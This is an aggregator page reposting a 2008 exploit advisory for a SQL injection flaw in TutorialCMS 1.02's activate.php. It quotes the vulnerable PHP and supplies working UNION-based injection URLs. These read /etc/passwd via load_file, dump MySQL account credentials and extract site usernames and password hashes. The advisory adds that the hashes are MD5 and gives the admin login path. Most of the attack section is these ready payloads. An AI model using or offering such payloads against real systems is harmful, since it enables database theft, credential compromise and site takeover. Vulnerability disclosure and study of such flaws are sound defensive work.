Lucene search

tutorialcms102-sql.txt

🗓️ 12 Jan 2008 00:00:00Reported by ka0xType

packetstorm🔗 packetstormsecurity.com👁 20 Views

TutorialCMS 1.02 Remote SQL Injection Vulnerability, Spain 200

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
TutorialCMS 1.02 Remote SQL Injection Vulnerability  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
bug found by ka0x  
contact: ka0x01[at]gmail.com  
D.O.M TEAM 2008  
we are: ka0x, an0de, xarnuz  
#from spain  
  
download http://www.wavelinkmedia.com/scripts/tutorialcms/  
  
need magic_quotes_gpc = off  
  
vulnerability in activate.php  
  
vuln code:  
[...]  
  
$userName = $_GET["userName"];  
$code = $_GET["activate"];  
$sql = "SELECT activated FROM users WHERE username = '$userName' AND activated = '$code'";  
  
[...]  
  
/etc/password:  
http://[host]/activate.php?userName='/**/union/**/select/**/1,2,3,4,load_file(0x2f6574632f706173737764),6,7,8,9,9,9,9,9/*  
  
User and Password from mysql.user:  
http://[host]/activate.php?userName='/**/union/**/select/**/1,2,3,4,concat(user,0x203a3a20,password),6,7,8,9,9,9,9,9/**/from/**/mysql.user/*  
  
POC: http://[host]/activate.php?userName='/**/union/**/select/**/1,2,3,4,concat(0x757365723a20,username,0x20706173733a20,password),6,7,8,9,9,9,9,9/**/from/**/users/*  
  
The encription of password is MD5  
login: http://[host]/admin  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

12 Jan 2008 00:00Current

7.4High risk

Vulners AI Score7.4